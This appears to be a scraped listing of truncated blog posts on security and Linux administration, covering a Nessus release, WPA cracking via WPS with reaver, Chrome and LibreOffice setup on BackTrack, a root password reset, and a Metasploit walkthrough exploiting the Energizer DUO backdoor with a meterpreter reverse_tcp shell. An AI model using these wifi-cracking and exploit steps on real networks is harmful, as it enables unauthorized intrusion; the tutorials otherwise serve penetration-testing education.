Posts

Nessus 5.0 Released

Nessus 5.0 introduces enhancements that streamline and optimize each of the major phases of the vulnerability and configuration assessment process. Specific benefits include: Streamlined startup – New installation wizard and web interface ensure Nessus 5.0 is up and running, completely configured, in minutes. Rapid policy creation – More than two dozen new plugin filters make it fast and easy to create policies for targeted scans. Selecting multiple filter criteria, such as vulnerability publication date, public vulnerability database ID, information assurance vulnerability alert (IAVA), and more, makes it simple to identify easily-exploitable vulner

BackTrack - Cracking a WPA password with reaver

Wi-Fi Protected Setup (WPS) was introduced to allow home users with little or no knowledge of wireless security to set up a wireless network encrypted with WPA or WPA2, as well as making it easy to add new devices to an existing network without entering long passwords/passphrases.

In this example I will be using BackTrack 5 R1 Gnome 32 bit. You can either boot off the DVD or install it. Creating a bootable DVD and installing BackTrack is beyond the scope of this tutorial. I'm assuming you have two network connections: one for internet access and one with your wireless adapter that we will be using in this test. In my case I'm using both a wired and wireless adapter.

Open up a terminal and run the following commands:

    apt-get update
    apt-get install reaver

Next we need to find out what interface is assigned to your wireless card, using the following command:

    iwconfig

In my case wlan0.

Next we need to put the wireless card into monitor mode.

    airmon-ng star

Run Chrome as root in BackTrack 5

Download Chrome from the Google Chrome site for the version you need: https://www.google.com/chrome/ In my case google-chrome-stable_current_i386.deb.

Install the Chrome version you downloaded, which should be a .deb file, using the following command. Substitute the file name of the version you downloaded.

    dpkg -i google-chrome-stable_current_i386.deb

However, when I launched Chrome I got the following error:

    Google Chrome can not be run as root

I edited the file /usr/bin/google-chrome using a text editor. Use your favourite; in my case I typed the following from a terminal:

    gedit /usr/bin/google-chrome

Go to the very bottom of the text and add --user-data-dir. Make sure you put a space between the "$@" and the --user-data-dir.

The last step is to save and quit the text editor. Done.

Installing Libre Office in Backtrack 5R1

Below are two possible options for installing LibreOffice in Backtrack 5R1.

Using the PPA installation of LibreOffice:

    root@bt:~# add-apt-repository ppa:libreoffice/ppa
    root@bt:~# apt-get update
    root@bt:~# apt-get install libreoffice

Downloading the install package from the LibreOffice website and installing manually:

Download the main install package from the LibreOffice website ( http://www.libreoffice.org/download ) and, if needed, your required language version to a temporary folder. In my case /root/Downloads.

Extract the main install file, in this example:

    tar zxvf LibO_3.4.2_Linux_x86_install-deb_en-US.tar.gz

Optionally, extract your local language pack. In my case en-GB:

    tar zxvf LibO_3.4.3_Linux_x86_langpack-deb_en-GB.tar.gz

Install the main package:

    root@bt:~# cd Downloads/LibO_3.4.2_Linux_x86_install-deb_en-US
    root@bt:~/Download/LibO_3.4.2_Linux_x86_install-deb_en-US# cd DEBS
    root@bt:~/Download/LibO_3.4.2_Linux_x86_install-deb_en-US/DEBS# sudo

Has UK gov lost the census to Lulzsec?

2011 UK census data apparently hacked. http://t.co/GMjfD0N I'll be keeping an eye on @LulzSec's Twitter feed for confirmation.

How To Reset A Forgotten root Password On A Linux Virtual Machine on XenServer

I recently had to carry out some maintenance on a Linux server hosted on our XenServer. However, I had forgotten the root password. Lesson learned: save passwords in a secure location, such as an encrypted USB stick or an encrypted file on my cell phone. Anyway, I digress; on to the "make it just work" section.

From XenCenter, select the virtual machine you want to boot in single user mode.

Shut down your virtual machine using the XenCenter controls.

Right click on the Boot Options for your virtual machine and select Properties.

Change the OS Boot Parameters to:

    rw init=/bin/bash

NOTE: If you already have something in the OS Boot Parameters, take note of it, as you will need to put it back once the password reset is complete.

Save and start your virtual machine. Your system will now boot up in single user mode.

Now it's time to change your password:

    machinename# passwd root

Type in your new password; you will then be asked to confirm it. Your password has

How To Exploit the Energizer Trojan

As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands.

    # msfconsole
    msf > use auxiliary/scanner/backdoor/energizer_duo_detect
    msf auxiliary(energizer_duo_detect) > set RHOSTS 10.0.0.0/24
    msf auxiliary(energizer_duo_detect) > set THREADS 256
    msf auxiliary(energizer_duo_detect) > run
    [*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"] .......

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

    msf > use exploit/windows/backdoor/energizer_duo_payload
    msf exploit(energizer_duo_payload) > set RHOST 10.0.0.23
    msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(energizer_duo_payload) > set LHOST 10.0.0.253
    msf exploit(energizer_duo_payload) > exploit
    [*] Started reverse handler on 10.0.0.23:4444
    [*] Trying to upload C:\NTL0ZTL4DhVL.exe...
    [*] T